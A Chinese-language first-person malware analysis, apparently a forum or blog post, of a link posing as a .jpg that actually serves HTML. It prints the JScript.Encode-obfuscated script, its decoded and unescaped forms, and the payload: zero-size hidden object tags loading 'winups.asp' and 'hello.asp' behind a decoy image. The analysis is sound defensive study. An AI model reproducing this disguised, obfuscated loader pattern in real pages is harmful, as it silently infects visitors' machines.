因为我事先知道是病毒,所以对待比较小心。我看到连接地址最后是一个.jpg的文件,于是我就打开了flashget,(用flashget下载,病毒总不会发作吧),下载后,怎么办?我看到下载下来的文件只有几k而已,料想不会有什么复杂的东西在里面,于是就启动了图像编辑器,打开这个文件。奇怪的事情发生了,格式错误!!!难道是我下错了?于是我就涨起胆子连到了那个网址上,一幅图片出现了,(其实我觉得哪个女的不漂亮,呵呵)。这下子我可傻了。根据我的经验,我已经中着了。反正也中着了,抱着死猪不怕开水烫的心态,我大胆的进行了进一步的分析。首先,我察看了一下哪个图片的属性。一个细节被我捕捉到了,我连接得网址最后是一个me.jpg,可是那幅图片的属性是my.jpg,这可是一个线索,于是我习惯性的打开了源文件(精彩的部分开始了)。我看到了如下的内容:
<html>
<head>
<script language="JScript.Encode">#@~^xQEAAA==@#@&@!Z O@#@&\mD,AWMNdP{JYf;tYss]22]Z9Y!z]2Z8W[zu&3]Z9]ZbYf;W4%n1YY Z[mYCu&G] yhbUEa/ lkwY+y] ZA+botDYffZ]y!Ak[O4]ffu+!Z]f3u&Z&G(LnmDY22YZfu!bu&;r:T]+!kD^Y2f:H Lao]23Y!G]ZbY&/G(LnmDY ZNCOm]&9Yy 4+^sKRCkwu u ZA+bo4Yu&9Tu !SrNDt]29Y Z!u&3]f/JW8L^Yu&3YZf]T)u&/z(G9XY22u!fu!zY&;z4YsVYfAJPJ&w!YPHG;D,mMk2YG~1W[+,OtDn@#@&0EU^DkGx,G!YAKD9`#@#@&P@#@&7l.P +AAKDNkI@#@&x+SAGD9/,''~EUnkmCwchKD[d*i@#@&[Km;:UDRAMkD+` +SAWMNd#p@#@&N,@#@&K;YSWD9cbi@#@&Jz~OR@*@#@&Qn4AAA==^#~@</script>
</head>
<body>
</body>
</html>
怪了!!!.jpg的文件怎么会成了<html>代码了呢?看来,作者还真下了一番功夫,把服务器的文件解析也改了?厉害厉害!!!看到没,加密了,不过不要紧,网上到处都可以找到解密工具。解密后,代码如下:
<html>
<head>
<script language="JScript.Encode">
<!--
var words ="%3Chtml%3E%0D%0A%3Cbody%3E%0D%0A%3Cobject%20data=%22winups.asp%22%20weight=0%20width=%200%3E%3C/object%3E%0D%0A%3Cimg%20src=my.jpg%3E%0D%0A%3Cobject%20data=%22hello.asp%22%20weight=0%20width=%200%3E%3C/object%3E%0D%0A%3C/body%3E%0D%0A%3C/html%3E" //put your cripto code there
。。。。。。。。这一段是加密后的代码
function outword()
{
var newwords;
newwords = unescape(words);
document.write(newwords);。。。。。。。解密后写入网页内
}
outword();
// -->
</script>
</head>
<body>
</body>
</html>
看来作者为了难为我们,还加密了这段代码,不过没关系,它能加密,我们就能解密,并且,他的加密手段很简单,不过是应用了现成的js的函数,我们用unescape()不就解密了么。于是,我动手写了一个小脚本,把上述代码解密了出来。
加密的代码内容如下:
<html>
<body>
<object data="winups.asp" weight=0 width= 0></object>
<img src=my.jpg>。。。。。。。。。现在明白为什么是my.jpg了吧
<object data="hello.asp" weight=0 width= 0></object>
</body>
</html>
